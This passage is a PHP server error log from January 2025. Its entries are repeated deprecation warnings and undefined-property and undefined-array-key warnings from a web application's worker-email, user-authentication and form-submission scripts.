($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:59:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:59:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:59:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:59:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:59:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:59:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:00:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:00:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:00:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:00:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:00:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:00:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:01:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:01:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:01:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:01:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:02:09 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:02:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:02:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:03:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:03:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:04:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:04:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:04:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:05:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 10:05:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:11:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 22:12:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:12:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:23:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:23:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:23:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:24:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:24:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:24:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 22:24:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 23:38:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 23:47:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 01:00:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 01:09:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 01:09:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 01:10:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Jan-2025 01:10:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Jan-2025 01:10:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Jan-2025 01:11:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Jan-2025 01:13:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Jan-2025 01:14:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Jan-2025 01:15:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Jan-2025 01:50:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 02:12:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 02:20:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 02:53:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 03:10:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 03:13:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 03:13:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 03:44:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 04:31:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 04:56:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 05:21:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 05:25:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [17-Jan-2025 05:30:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 05:31:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [17-Jan-2025 06:18:08 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [17-Jan-2025 07:12:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 07:22:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 07:31:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 08:36:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Jan-2025 13:39:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Jan-2025 09:43:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Jan-2025 09:44:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:44:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:44:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:44:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:45:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:45:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:45:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:45:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:45:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:46:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:46:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:46:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:46:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:46:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:47:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:47:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:47:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:47:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:47:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:47:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:47:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:48:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:48:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:48:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:48:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:48:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:49:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:49:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:49:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:49:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:49:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:51:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:51:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:51:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:52:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:52:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:52:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:52:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:52:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:52:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:53:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 09:53:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 12:05:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Jan-2025 19:53:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Jan-2025 19:54:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:39:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Jan-2025 21:41:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:42:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:42:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:42:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:46:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:46:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:49:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:50:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:50:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:52:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:52:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:52:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:53:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:54:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:57:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 21:57:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Jan-2025 22:09:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Jan-2025 22:47:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Jan-2025 22:48:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:48:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:48:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:49:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:49:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:49:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:50:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:50:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:50:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:50:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 22:51:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Jan-2025 23:47:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 00:00:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 00:21:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 01:00:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [20-Jan-2025 01:02:46 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [20-Jan-2025 02:17:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 02:18:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 02:18:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 02:19:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 02:19:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 02:20:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 02:20:19 